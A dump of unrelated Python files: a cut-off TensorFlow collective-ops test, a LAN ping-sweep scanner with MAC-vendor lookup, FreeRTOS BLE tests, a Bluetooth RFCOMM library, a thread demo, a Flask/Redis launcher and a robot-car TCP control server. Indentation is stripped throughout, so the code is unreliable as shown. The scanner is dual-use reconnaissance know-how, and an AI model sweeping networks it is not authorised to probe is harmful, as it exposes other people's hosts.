group_size=group_size,
communication_hint=communication)
collectives.append(
_collective_ops.all_reduce_v3(
group_handle0, [1.0], reduction='Add'))
with ops.device(dev1):
group_handle1 = _collective_ops.initialize_communicator(
group_key=group_key,
rank=1,
group_size=group_size,
communication_hint=communication)
collectives.append(
_collective_ops.all_reduce_v3(
group_handle1, [2.0], reduction='Add'))
return collectives
for result in run_all_reduce_2devices():
self.assertAllClose(result, [3.], rtol=1e-5, atol=1e-5)
@combinations.generate(device_combination)
def testAllToAllV3(self, device, communication):
group_size = 2
group_key = 104
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_to_all_2devices():
collectives = []
with ops.device(dev0):
group_handle0 = _collective_ops.initialize_communicator(
group_key=group_key,
rank=0,
group_size=group_size,
communication_hint=communication)
collectives.append(
_collective_ops.all_to_all_v3(group_handle0, [1.0, 3.0]))
with ops.device(dev1):
group_handle1 = _collective_ops.initialize_communicator(
group_key=group_key,
rank=1,
group_size=group_size,
communication_hint=communication)
collectives.append(
_collective_ops.all_to_all_v3(group_handle1, [2.0, 4.0]))
return collectives
result = run_all_to_all_2devices()
self.assertAllClose(result[0], [1.0, 2.0], rtol=1e-5, atol=1e-5)
self.assertAllClose(result[1], [3.0, 4.0], rtol=1e-5, atol=1e-5)
def _setup_context():
context._reset_context()
test_util.set_logical_devices_to_at_least('CPU', 4)
context.ensure_initialized()
if __name__ == '__main__':
os.environ['NCCL_DEBUG'] = 'INFO'
v2_compat.enable_v2_behavior()
test.main()
|
scanner.py | from multiprocessing import Process, Manager
from os import devnull, popen
from threading import Thread
from subprocess import Popen, PIPE, STDOUT
from tabulate import tabulate
import requests
class ThreadFastScanIP(Thread):
def __init__(self, gateway, range_start, range_end, parent= None):
super(ThreadFastScanIP, self).__init__(parent)
self.range_start = range_start
self.range_end = range_end
self.working_thread = True
self.on_ips = []
# '192.168.174.'
self.gatewayNT = gateway[:len(gateway) - len(gateway.split('.').pop())]
def run(self):
self.jobs = []
self.manager = Manager()
self.on_ips = self.manager.dict()
for count in range(self.range_start, self.range_end):
ip='%s{0}'.format(count)%(self.gatewayNT)
if not self.working_thread: break
p = Process(target=self.working, args=(ip, self.on_ips))
self.jobs.append(p)
p.start()
for proc in self.jobs:
proc.join()
proc.terminate()
def working(self, ip, lista):
with open(devnull , 'wb') as limbo:
result = Popen(['ping', '-c', '1', '-n' , '-W' , '1' , ip],
stdout=limbo, stderr=limbo).wait()
if not result:
if (self.get_mac(ip) == None):
lista[ip] = {'mac' : '', 'vendor' : ''}
else:
lista[ip] = {'mac' : self.get_mac(ip),
'vendor' : self.resolver_mac(self.get_mac(ip))}
def get_mac(self, host):
fields = popen('grep "%s" /proc/net/arp' % host).read().split()
if len(fields) == 6 and fields[3] != '00:00:00:00:00:00':
return fields[3]
return None
def resolver_mac(self,mac):
MAC_URL = 'http://macvendors.co/api/%s'
try:
r = requests.get(MAC_URL % mac.upper())
except:
return ''
return r.json()['result']['company']
def getOutput(self):
return self.on_ips
def showoutput_table(self):
keys = self.on_ips.keys()
values = self.on_ips.values()
data = { 'IP': keys,
'MAC' : [v['mac'] for v in values],
'VENDORS' : [v['vendor'] for v in values]}
print(tabulate(data, headers='keys'))
if (__name__ == '__main__'):
thread_scan = ThreadFastScanIP('192.168.174.1', 0, 255)
thread_scan.start()
thread_scan.join()
#print(thread_scan.getOutput())
print(thread_scan.showoutput_table()) |
test1.py | #
# FreeRTOS BLE HAL V2.0.0
# Copyright (C) 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# http://aws.amazon.com/freertos
# http://www.FreeRTOS.org
#
#!/usr/bin/python
from __future__ import absolute_import, print_function, unicode_literals
from optparse import OptionParser, make_option
import dbus
import time
import dbus.mainloop.glib
import bleAdapter
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
import testutils
import startTests_afqp as startTests
import threading
import securityAgent
devices = {}
def backGroundEvents():
try:
mainloop = GObject.MainLoop()
mainloop.run()
except KeyboardInterrupt:
mainloop.quit()
print("Thread: KeyboardInterrupt")
return
if __name__ == '__main__':
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
testutils.removeBondedDevices()
#startBackGroundEvents = threading.Thread(target=backGroundEvents)
# startBackGroundEvents.start()
startTests.main()
|
btcomm.py | from __future__ import unicode_literals
import socket
import sys
import errno
from .utils import (
register_spp,
get_mac,
get_adapter_powered_status,
get_adapter_discoverable_status,
get_adapter_pairable_status,
get_paired_devices,
device_pairable,
device_discoverable,
device_powered,
)
from .threads import WrapThread
BLUETOOTH_TIMEOUT = 0.01
class BluetoothAdapter(object):
"""
Represents and allows interaction with a Bluetooth Adapter.
The following example will get the Bluetooth adapter, print its powered status
and any paired devices::
a = BluetoothAdapter()
print("Powered = {}".format(a.powered))
print(a.paired_devices)
:param str device:
The Bluetooth device to be used, the default is "hci0", if your device
only has 1 Bluetooth adapter this shouldn't need to be changed.
"""
def __init__(self, device = "hci0"):
self._device = device
self._address = get_mac(self._device)
self._pairing_thread = None
@property
def device(self):
"""
The Bluetooth device name. This defaults to "hci0".
"""
return self._device
@property
def address(self):
"""
The `MAC address`_ of the Bluetooth adapter.
.. _MAC address: https://en.wikipedia.org/wiki/MAC_address
"""
return self._address
@property
def powered(self):
"""
Set to ``True`` to power on the Bluetooth adapter.
Depending on how Bluetooth has been powered down, you may need to use
:command:`rfkill` to unblock Bluetooth to give permission to bluez to power on Bluetooth::
sudo rfkill unblock bluetooth
"""
return get_adapter_powered_status(self._device)
@powered.setter
def powered(self, value):
device_powered(self._device, value)
@property
def discoverable(self):
"""
Set to ``True`` to make the Bluetooth adapter discoverable.
"""
return get_adapter_discoverable_status(self._device)
@discoverable.setter
def discoverable(self, value):
device_discoverable(self._device, value)
@property
def pairable(self):
"""
Set to ``True`` to make the Bluetooth adapter pairable.
"""
return get_adapter_pairable_status(self._device)
@pairable.setter
def pairable(self, value):
device_pairable(self._device, value)
@property
def paired_devices(self):
"""
Returns a sequence of devices paired with this adapater
:code:`[(mac_address, name), (mac_address, name), ...]`::
a = BluetoothAdapter()
devices = a.paired_devices
for d in devices:
device_address = d[0]
device_name = d[1]
"""
return get_paired_devices(self._device)
def allow_pairing(self, timeout = 60):
"""
Put the adapter into discoverable and pairable mode.
:param int timeout:
The time in seconds the adapter will remain pairable. If set to ``None``
the device will be discoverable and pairable indefinetly.
"""
#if a pairing thread is already running, stop it and restart
if self._pairing_thread:
if self._pairing_thread.is_alive:
self._pairing_thread.stop()
#make the adapter pairable
self.pairable = True
self.discoverable = True
if timeout != None:
#start the pairing thread
self._pairing_thread = WrapThread(target=self._expire_pairing, args=(timeout, ))
self._pairing_thread.start()
def _expire_pairing(self, timeout):
#wait till the timeout or the thread is stopped
self._pairing_thread.stopping.wait(timeout)
self.discoverable = False
self.pairable = False
class BluetoothServer(object):
"""
Creates a Bluetooth server which will allow connections and accept incoming
RFCOMM serial data.
When data is received by the server it is passed to a callback function
which must be specified at initiation.
The following example will create a Bluetooth server which will wait for a
connection and print any data it receives and send it back to the client::
from bluedot.btcomm import BluetoothServer
from signal import pause
def data_received(data):
print(data)
s.send(data)
s = BluetoothServer(data_received)
pause()
:param data_received_callback:
A function reference should be passed, this function will be called when
data is received by the server. The function should accept a single parameter
which when called will hold the data received. Set to ``None`` if received
data is not required.
:param bool auto_start:
If ``True`` (the default), the Bluetooth server will be automatically started
on initialisation, if ``False``, the method ``start`` will need to be called
before connections will be accepted.
:param str device:
The Bluetooth device the server should use, the default is "hci0", if
your device only has 1 Bluetooth adapter this shouldn't need to be changed.
:param int port:
The Bluetooth port the server should use, the default is 1.
:param str encoding:
The encoding standard to be used when sending and receiving byte data. The default is
"utf-8". If set to ``None`` no encoding is done and byte data types should be used.
:param bool power_up_device:
If ``True``, the Bluetooth device will be powered up (if required) when the
server starts. The default is ``False``.
Depending on how Bluetooth has been powered down, you may need to use :command:`rfkill`
to unblock Bluetooth to give permission to bluez to power on Bluetooth::
sudo rfkill unblock bluetooth
:param when_client_connects:
A function reference which will be called when a client connects. If ``None``
(the default), no notification will be given when a client connects
:param when_client_disconnects:
A function reference which will be called when a client disconnects. If ``None``
(the default), no notification will be given when a client disconnects
"""
def __init__(self,
data_received_callback,
auto_start = True,
device = "hci0",
port = 1,
encoding = "utf-8",
power_up_device = False,
when_client_connects = None,
when_client_disconnects = None):
self._setup_adapter(device)
self._data_received_callback = data_received_callback
self._port = port
self._encoding = encoding
self._power_up_device = power_up_device
self._when_client_connects = when_client_connects
self._when_client_disconnects = when_client_disconnects
self._running = False
self._client_connected = False
self._server_sock = None
self._client_info = None
self._client_sock = None
self._conn_thread = None
if auto_start:
self.start()
@property
def device(self):
"""
The Bluetooth device the server is using. This defaults to "hci0".
"""
return self.adapter.device
@property
def adapter(self):
"""
A :class:`BluetoothAdapter` object which represents the Bluetooth device
the server is using.
"""
return self._adapter
@property
def port(self):
"""
The port the server is using. This defaults to 1.
"""
return self._port
@property
def encoding(self):
"""
The encoding standard the server is using. This defaults to "utf-8".
"""
return self._encoding
@property
def running(self):
"""
Returns a ``True`` if the server is running.
"""
return self._running
@property
def server_address(self):
"""
The `MAC address`_ of the device the server is using.
.. _MAC address: https://en.wikipedia.org/wiki/MAC_address
"""
return self.adapter.address
@property
def client_address(self):
"""
The `MAC address`_ of the client connected to the server. Returns
``None`` if no client is connected.
.. _MAC address: https://en.wikipedia.org/wiki/MAC_address
"""
if self._client_info:
return self._client_info[0]
else:
return None
@property
def client_connected(self):
"""
Returns ``True`` if a client is connected.
"""
return self._client_connected
@property
def data_received_callback(self):
"""
Sets or returns the function which is called when data is received by the server.
The function should accept a single parameter which when called will hold
the data received. Set to ``None`` if received data is not required.
"""
return self._data_received_callback
@data_received_callback.setter
def data_received_callback(self, value):
self._data_received_callback = value
@property
def when_client_connects(self):
"""
Sets or returns the function which is called when a client connects.
"""
return self._when_client_connects
@when_client_connects.setter
def when_client_connects(self, value):
self._when_client_connects = value
@property
def when_client_disconnects(self):
"""
Sets or returns the function which is called when a client disconnects.
"""
return self._when_client_disconnects
@when_client_disconnects.setter
def when_client_disconnects(self, value):
self._when_client_disconnects = value
def start(self):
"""
Starts the Bluetooth server if its not already running. The server needs to be started before
connections can be made.
"""
if not self._running:
if self._power_up_device:
self.adapter.powered = True
if not self.adapter.powered:
raise Exception("Bluetooth device {} is turned off".format(self.adapter.device))
#register the serial port profile with Bluetooth
register_spp(self._port)
#start Bluetooth server
#open the Bluetooth socket
self._server_sock = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
self._server_sock.settimeout(BLUETOOTH_TIMEOUT)
try:
self._server_sock.bind((self.server_address, self.port))
except (socket.error, OSError) as e:
if e.errno == errno.EADDRINUSE:
print("Bluetooth address {} is already in use - is the server already running?".format(self.server_address))
raise e
self._server_sock.listen(1)
#wait for client connection
self._conn_thread = WrapThread(target=self._wait_for_connection)
self._conn_thread.start()
self._running = True
def stop(self):
"""
Stops the Bluetooth server if its running.
"""
if self._running:
if self._conn_thread:
self._conn_thread.stop()
self._conn_thread = None
def send(self, data):
"""
Send data to a connected Bluetooth client
:param str data:
The data to be sent.
"""
if self._client_connected:
if self._encoding is not None:
data = data.encode(self._encoding)
try:
self._send_data(data)
except IOError as e:
self._handle_bt_error(e)
def _send_data(self, data):
"""
Send raw data to the client.
:param bytes data:
The data to be sent.
"""
self._client_sock.send(data)
def disconnect_client(self):
"""
Disconnects the client if connected. Returns `True` if a client was disconnected.
"""
if self._client_connected:
self._client_connected = False
# call the callback
if self.when_client_disconnects:
WrapThread(target=self.when_client_disconnects).start()
return True
else:
return False
def _setup_adapter(self, device):
self._adapter = BluetoothAdapter(device)
def _wait_for_connection(self):
#keep going until the server is stopped
while not self._conn_thread.stopping.is_set():
#wait for connection
self._client_connected = False
while not self._conn_thread.stopping.is_set():
try:
# accept() will timeout after BLUETOOTH_TIMEOUT seconds
self._client_sock, self._client_info = self._server_sock.accept()
self._client_connected = True
break
except socket.timeout as e:
self._handle_bt_error(e)
#did a client connect?
if self._client_connected:
#call the call back
if self.when_client_connects:
WrapThread(target=self.when_client_connects).start()
#read data
self._read()
#server has been stopped
self._server_sock.close()
self._server_sock = None
self._running = False
def _read(self):
#read until the server is stopped or the client disconnects
while self._client_connected:
#read data from Bluetooth socket
try:
data = self._client_sock.recv(1024, socket.MSG_DONTWAIT)
except IOError as e:
self._handle_bt_error(e)
data = b""
if data:
if self._data_received_callback:
if self._encoding:
data = data.decode(self._encoding)
self.data_received_callback(data)
if self._conn_thread.stopping.wait(BLUETOOTH_TIMEOUT):
break
#close the client socket
self._client_sock.close()
self._client_sock = None
self._client_info = None
self._client_connected = False
def _handle_bt_error(self, bt_error):
assert isinstance(bt_error, IOError)
#'timed out' is caused by the wait_for_connection loop
if isinstance(bt_error, socket.timeout):
pass
#'resource unavailable' is when data cannot be read because there is nothing in the buffer
elif bt_error.errno == errno.EAGAIN:
pass
#'connection reset' is caused when the client disconnects
elif bt_error.errno == errno.ECONNRESET:
self.disconnect_client()
#'conection timeout' is caused when the server can no longer connect to read from the client
# (perhaps the client has gone out of range)
elif bt_error.errno == errno.ETIMEDOUT:
self.disconnect_client()
else:
raise bt_error
class BluetoothClient():
"""
Creates a Bluetooth client which can send data to a server using RFCOMM Serial Data.
The following example will create a Bluetooth client which will connect to a paired
device called "raspberrypi", send "helloworld" and print any data is receives::
from bluedot.btcomm import BluetoothClient
from signal import pause
def data_received(data):
print(data)
c = BluetoothClient("raspberrypi", data_received)
c.send("helloworld")
pause()
:param str server:
The server name ("raspberrypi") or server MAC address
("11:11:11:11:11:11") to connect to. The server must be a paired device.
:param data_received_callback:
A function reference should be passed, this function will be called when
data is received by the client. The function should accept a single parameter
which when called will hold the data received. Set to ``None`` if data
received is not required.
:param int port:
The Bluetooth port the client should use, the default is 1.
:param str device:
The Bluetooth device to be used, the default is "hci0", if your device
only has 1 Bluetooth adapter this shouldn't need to be changed.
:param str encoding:
The encoding standard to be used when sending and receiving byte data. The default is
"utf-8". If set to ``None`` no encoding is done and byte data types should be used.
:param bool power_up_device:
If ``True``, the Bluetooth device will be powered up (if required) when the
server starts. The default is ``False``.
Depending on how Bluetooth has been powered down, you may need to use :command:`rfkill`
to unblock Bluetooth to give permission to Bluez to power on Bluetooth::
sudo rfkill unblock bluetooth
:param bool auto_connect:
If ``True`` (the default), the Bluetooth client will automatically try
to connect to the server at initialisation, if ``False``, the
:meth:`connect` method will need to be called.
"""
def __init__(self,
server,
data_received_callback,
port = 1,
device = "hci0",
encoding = "utf-8",
power_up_device = False,
auto_connect = True):
self._server = server
self._data_received_callback = data_received_callback
self._port = port
self._power_up_device = power_up_device
self._encoding = encoding
self._setup_adapter(device)
self._connected = False
self._client_sock = None
self._conn_thread = None
if auto_connect:
self.connect()
@property
def device(self):
"""
The Bluetooth device the client is using. This defaults to "hci0".
"""
return self.adapter.device
@property
def server(self):
"""
The server name ("raspberrypi") or server `MAC address`_
("11:11:11:11:11:11") to connect to.
.. _MAC address: https://en.wikipedia.org/wiki/MAC_address
"""
return self._server
@property
def port(self):
"""
The port the client is using. This defaults to 1.
"""
return self._port
@property
def adapter(self):
"""
A :class:`BluetoothAdapter` object which represents the Bluetooth
device the client is using.
"""
return self._adapter
@property
def encoding(self):
"""
The encoding standard the client is using. The default is "utf-8".
"""
return self._encoding
@property
def client_address(self):
"""
The MAC address of the device being used.
"""
return self.adapter.address
@property
def connected(self):
"""
Returns ``True`` when connected.
"""
return self._connected
@property
def data_received_callback(self):
"""
Sets or returns the function which is called when data is received by the client.
The function should accept a single parameter which when called will hold
the data received. Set to ``None`` if data received is not required.
"""
return self._data_received_callback
@data_received_callback.setter
def data_received_callback(self, value):
self._data_received_callback = value
def connect(self):
"""
Connect to a Bluetooth server.
"""
if not self._connected:
if self._power_up_device:
self.adapter.powered = True
if not self.adapter.powered:
raise Exception("Bluetooth device {} is turned off".format(self.adapter.device))
#try and find the server name or MAC address in the paired devices list
server_mac = None
for device in self.adapter.paired_devices:
if self._server == device[0] or self._server == device[1]:
server_mac = device[0]
break
if server_mac == None:
raise Exception("Server {} not found in paired devices".format(self._server))
#create a socket
self._client_sock = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
self._client_sock.bind((self.adapter.address, self._port))
self._client_sock.connect((server_mac, self._port))
self._connected = True
self._conn_thread = WrapThread(target=self._read)
self._conn_thread.start()
def disconnect(self):
"""
Disconnect from a Bluetooth server.
"""
if self._connected:
#stop the connection thread
if self._conn_thread:
self._conn_thread.stop()
self._conn_thread = None
#close the socket
try:
self._client_sock.close()
finally:
self._client_sock = None
self._connected = False
def send(self, data):
"""
Send data to a Bluetooth server.
:param str data:
The data to be sent.
"""
if self._connected:
if self._encoding is not None:
data = data.encode(self._encoding)
try:
self._send_data(data)
except IOError as e:
self._handle_bt_error(e)
def _send_data(self, data):
"""
Send raw data to the client.
:param bytes data:
The data to be sent.
"""
self._client_sock.send(data)
def _read(self):
#read until the client is stopped or the client disconnects
while self._connected:
#read data from Bluetooth socket
try:
data = self._client_sock.recv(1024, socket.MSG_DONTWAIT)
except IOError as e:
self._handle_bt_error(e)
data = b""
if data:
#print("received [%s]" % data)
if self._data_received_callback:
if self._encoding:
data = data.decode(self._encoding)
self.data_received_callback(data)
if self._conn_thread.stopping.wait(BLUETOOTH_TIMEOUT):
break
def _setup_adapter(self, device):
self._adapter = BluetoothAdapter(device)
def _handle_bt_error(self, bt_error):
assert isinstance(bt_error, IOError)
#'resource unavailable' is when data cannot be read because there is nothing in the buffer
if bt_error.errno == errno.EAGAIN:
pass
#'connection reset' is caused when the client disconnects
elif bt_error.errno == errno.ECONNRESET:
self._connected = False
#'conection timeout' is caused when the server can no longer connect to read from the client
# (perhaps the client has gone out of range)
elif bt_error.errno == errno.ETIMEDOUT:
self._connected = False
else:
raise bt_error
|
SleepableThread.py | import threading
import time
import os
from termcolor import colored
class SleepableThread(threading.Thread):
def __init__(self):
super(SleepableThread, self).__init__()
self.create_thread()
self.start_thread()
thread = None
thread_pid = ''
thread_spawn_count = 0
thread_state = 0
def create_thread(self):
print ' Creating thread.'
self.thread_spawn_count += 1
self.thread = threading.Thread(target=self.run, name='thread_{}'.format(self.thread_spawn_count), args=())
self.thread_pid = 'None'
self.thread_state = 1
def start_thread(self):
if self.thread_state == 1:
print ' Starting thread.'
self.thread.start()
self.thread_pid = self.thread.ident
self.thread_state = 2
elif self.thread_state == 2:
print ' The thread has already started.'
elif self.thread_state == 3:
print ' The thread has already started and is currently asleep.'
elif self.thread_state == 4:
print ' The thread is ended. Try restarting the thread.'
def sleep_thread(self):
if self.thread_state == 1:
print ' The thread has not started yet.'
elif self.thread_state == 2:
print ' Sleeping thread.'
self.thread_state = 3
elif self.thread_state == 3:
print ' The thread is already sleeping.'
elif self.thread_state == 4:
print ' The thread has already ended.'
def wake_thread(self):
if self.thread_state == 1:
print ' The thread has not started yet.'
elif self.thread_state == 2:
print ' The thread is running and not sleeping.'
elif self.thread_state == 3:
print ' Waking thread.'
self.thread_state = 2
elif self.thread_state == 4:
print ' The thread has already ended.'
def stop_thread(self):
if self.thread_state == 1:
print ' The thread has not started yet.'
elif self.thread_state == 2 or self.thread_state == 3:
print ' Stopping thread.'
self.thread_state = 4
elif self.thread_state == 4:
print ' The thread has already ended.'
def restart_thread(self):
if self.thread_state == 2 or self.thread_state == 3:
self.stop_thread()
time.sleep(0.5)
if self.thread_state == 4:
self.create_thread()
if self.thread_state == 1:
self.start_thread()
def thread_status(self):
if self.thread_state == 1:
return colored('READY', 'yellow')
elif self.thread_state == 2:
return colored('RUNNING', 'green')
elif self.thread_state == 3:
return colored('SLEEPING', 'yellow')
elif self.thread_state == 4:
return colored('ENDED', 'red')
def run(self):
while self.thread_state != 4:
if self.thread_state == 3:
while self.thread_state == 3:
print 'Sleeping'
time.sleep(5)
else:
print 'Running'
time.sleep(5)
def parse_thread_command(self, cmd):
cmd = cmd.lower()
if cmd == 'create':
self.create_thread()
elif cmd == 'start' or cmd == 'begin':
self.start_thread()
elif cmd == 'sleep':
self.sleep_thread()
elif cmd == 'wake':
self.wake_thread()
elif cmd == 'stop' or cmd == 'end' or cmd == 'kill':
self.stop_thread()
elif cmd == 'restart':
self.restart_thread()
def terminal(self):
while True:
print 'Thread {}({}) spawn count: '.format(self.thread.name, self.thread.ident), self.thread_spawn_count, \
' | Thread state: ', self.thread_state, ' | ', self.thread_status()
cmd = raw_input('Enter command: ')
if cmd == 'create':
self.create_thread()
elif cmd == 'start':
self.start_thread()
elif cmd == 'sleep':
self.sleep_thread()
elif cmd == 'wake':
self.wake_thread()
elif cmd == 'stop':
self.stop_thread()
elif cmd == 'restart':
self.restart_thread()
elif cmd == 'c':
os.system('cls')
else:
pass
if __name__ == "__main__":
t = SleepableThread()
t.terminal()
|
__init__.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# 2020, Jan Cervenka
import redis
import multiprocessing as mp
from .app import create_app
from .backend import RequestProcessor
from .constants import (REDIS_HOST, REDIS_PORT,
DEFAULT_SERVICE_HOST, DEFAULT_SERIVCE_PORT)
def run_app(args):
"""
Runs the API frontend.
"""
app = create_app(
redis_host=REDIS_HOST,
redis_port=REDIS_PORT)
app.run(
host=DEFAULT_SERVICE_HOST,
port=DEFAULT_SERIVCE_PORT,
debug=args.debug)
def run_backend(args):
"""
Runs the request processing backend.
"""
# from ..tests.utils import MockKerasModel
# model = MockKerasModel(image_shape=(128, 128, 3), n_output=1)
from tensorflow.keras.models import load_model
model = load_model(args.model)
db = redis.StrictRedis(
host=REDIS_HOST, port=REDIS_PORT, db=0)
request_processor = RequestProcessor(db=db, model=model)
request_processor.run()
def run_service(args):
"""
Runs the app and the backend as two processed.
"""
process_backend = mp.Process(target=run_backend, args=(args,))
process_backend.start()
process_app = mp.Process(target=run_app, args=(args,))
process_app.start()
# process_app.join()
|
server.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import io
import socket
import struct
import time
import picamera
import fcntl
import sys
import threading
from Motor import *
from servo import *
from Led import *
from Buzzer import *
from ADC import *
from Thread import *
from Light import *
from Ultrasonic import *
from Line_Tracking import *
from threading import Timer
from threading import Thread
from Command import COMMAND as cmd
class Server:
def __init__(self):
self.PWM=Motor()
self.servo=Servo()
self.led=Led()
self.ultrasonic=Ultrasonic()
self.buzzer=Buzzer()
self.adc=Adc()
self.light=Light()
self.infrared=Line_Tracking()
self.tcp_Flag = True
self.sonic=False
self.Light=False
self.Mode = 'one'
self.endChar='\n'
self.intervalChar='#'
def get_interface_ip(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(s.fileno(),
0x8915,
struct.pack('256s',b'wlan0'[:15])
)[20:24])
def StartTcpServer(self):
HOST=str(self.get_interface_ip())
self.server_socket1 = socket.socket()
self.server_socket1.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEPORT,1)
self.server_socket1.bind((HOST, 5000))
self.server_socket1.listen(1)
self.server_socket = socket.socket()
self.server_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEPORT,1)
self.server_socket.bind((HOST, 8000))
self.server_socket.listen(1)
print('Server address: '+HOST)
def StopTcpServer(self):
try:
self.connection.close()
self.connection1.close()
except Exception as e:
print ('\n'+"No client connection")
def Reset(self):
self.StopTcpServer()
self.StartTcpServer()
self.SendVideo=Thread(target=self.sendvideo)
self.ReadData=Thread(target=self.readdata)
self.SendVideo.start()
self.ReadData.start()
def send(self,data):
self.connection1.send(data.encode('utf-8'))
def sendvideo(self):
try:
self.connection,self.client_address = self.server_socket.accept()
self.connection=self.connection.makefile('wb')
except:
pass
self.server_socket.close()
try:
with picamera.PiCamera() as camera:
camera.resolution = (400,300) # pi camera resolution
camera.framerate = 15 # 15 frames/sec
time.sleep(2) # give 2 secs for camera to initilize
start = time.time()
stream = io.BytesIO()
# send jpeg format video stream
print ("Start transmit ... ")
for foo in camera.capture_continuous(stream, 'jpeg', use_video_port = True):
try:
self.connection.flush()
stream.seek(0)
b = stream.read()
length=len(b)
if length >5120000:
continue
lengthBin = struct.pack('L', length)
self.connection.write(lengthBin)
self.connection.write(b)
stream.seek(0)
stream.truncate()
except Exception as e:
print(e)
print ("End transmit ... " )
break
except:
#print "Camera unintall"
pass
def stopMode(self):
try:
stop_thread(self.infraredRun)
self.PWM.setMotorModel(0,0,0,0)
except:
pass
try:
stop_thread(self.lightRun)
self.PWM.setMotorModel(0,0,0,0)
except:
pass
try:
stop_thread(self.ultrasonicRun)
self.PWM.setMotorModel(0,0,0,0)
self.servo.setServoPwm('0',90)
self.servo.setServoPwm('1',90)
except:
pass
def readdata(self):
try:
try:
self.connection1,self.client_address1 = self.server_socket1.accept()
print ("Client connection successful !")
except:
print ("Client connect failed")
restCmd=""
self.server_socket1.close()
while True:
try:
AllData=restCmd+self.connection1.recv(1024).decode('utf-8')
except:
if self.tcp_Flag:
self.Reset()
break
print(AllData)
if len(AllData) < 5:
restCmd=AllData
if restCmd=='' and self.tcp_Flag:
self.Reset()
break
restCmd=""
if AllData=='':
break
else:
cmdArray=AllData.split("\n")
if(cmdArray[-1] != ""):
restCmd=cmdArray[-1]
cmdArray=cmdArray[:-1]
for oneCmd in cmdArray:
data=oneCmd.split("#")
if data==None:
continue
elif cmd.CMD_MODE in data:
if data[1]=='one' or data[1]=="1":
self.stopMode()
self.Mode='one'
elif data[1]=='two' or data[1]=="3":
self.stopMode()
self.Mode='two'
self.lightRun=Thread(target=self.light.run)
self.lightRun.start()
elif data[1]=='three' or data[1]=="4":
self.stopMode()
self.Mode='three'
self.ultrasonicRun=threading.Thread(target=self.ultrasonic.run)
self.ultrasonicRun.start()
elif data[1]=='four' or data[1]=="2":
self.stopMode()
self.Mode='four'
self.infraredRun=threading.Thread(target=self.infrared.run)
self.infraredRun.start()
elif (cmd.CMD_MOTOR in data) and self.Mode=='one':
try:
data1=int(data[1])
data2=int(data[2])
data3=int(data[3])
data4=int(data[4])
if data1==None or data2==None or data2==None or data3==None:
continue
self.PWM.setMotorModel(data1,data2,data3,data4)
except:
pass
elif cmd.CMD_SERVO in data:
try:
data1=data[1]
data2=int(data[2])
if data1==None or data2==None:
continue
self.servo.setServoPwm(data1,data2)
except:
pass
elif cmd.CMD_LED in data:
try:
data1=int(data[1])
data2=int(data[2])
data3=int(data[3])
data4=int(data[4])
if data1==None or data2==None or data2==None or data3==None:
continue
self.led.ledIndex(data1,data2,data3,data4)
except:
pass
elif cmd.CMD_LED_MOD in data:
self.LedMoD=data[1]
if self.LedMoD== '0':
try:
stop_thread(Led_Mode)
except:
pass
self.led.ledMode(self.LedMoD)
time.sleep(0.1)
self.led.ledMode(self.LedMoD)
else :
try:
stop_thread(Led_Mode)
except:
pass
time.sleep(0.1)
Led_Mode=Thread(target=self.led.ledMode,args=(data[1],))
Led_Mode.start()
elif cmd.CMD_SONIC in data:
if data[1]=='1':
self.sonic=True
self.ultrasonicTimer = threading.Timer(0.5,self.sendUltrasonic)
self.ultrasonicTimer.start()
else:
self.sonic=False
elif cmd.CMD_BUZZER in data:
try:
self.buzzer.run(data[1])
except:
pass
elif cmd.CMD_LIGHT in data:
if data[1]=='1':
self.Light=True
self.lightTimer = threading.Timer(0.3,self.sendLight)
self.lightTimer.start()
else:
self.Light=False
elif cmd.CMD_POWER in data:
ADC_Power=self.adc.recvADC(2)*3
try:
self.send(cmd.CMD_POWER+'#'+str(ADC_Power)+'\n')
except:
pass
except Exception as e:
print(e)
self.StopTcpServer()
def sendUltrasonic(self):
if self.sonic==True:
ADC_Ultrasonic=self.ultrasonic.get_distance()
if ADC_Ultrasonic==self.ultrasonic.get_distance():
try:
self.send(cmd.CMD_SONIC+"#"+str(ADC_Ultrasonic)+'\n')
except:
self.sonic=False
self.ultrasonicTimer = threading.Timer(0.13,self.sendUltrasonic)
self.ultrasonicTimer.start()
def sendLight(self):
if self.Light==True:
ADC_Light1=self.adc.recvADC(0)
ADC_Light2=self.adc.recvADC(1)
try:
self.send(cmd.CMD_LIGHT+'#'+str(ADC_Light1)+'#'+str(ADC_Light2)+'\n')
except:
self.Light=False
self.lightTimer = threading.Timer(0.17,self.sendLight)
self.lightTimer.start()
def Power(self):
while True:
ADC_Power=self.adc.recvADC(2)*3
time.sleep(3)
if ADC_Power < 6.8:
for i in range(4):
self.buzzer.run('1')
time.sleep(0.1)
self.buzzer.run('0')
time.sleep(0.1)
elif ADC_Power< 7:
for i in range(2):
self.buzzer.run('1')
time.sleep(0.1)
self.buzzer.run('0')
time.sleep(0.1)
else:
self.buzzer.run('0')
if __name__=='__main__':
serv = Server()
serv.Reset()
|
